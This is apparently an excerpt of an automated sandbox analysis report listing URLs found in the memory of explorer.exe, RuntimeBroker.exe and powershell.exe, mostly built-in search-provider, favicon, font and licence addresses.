Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmp	String found in binary or memory: http://twitter.com/spotify:
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000000.807813167.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms04.5172
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.Hulu
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
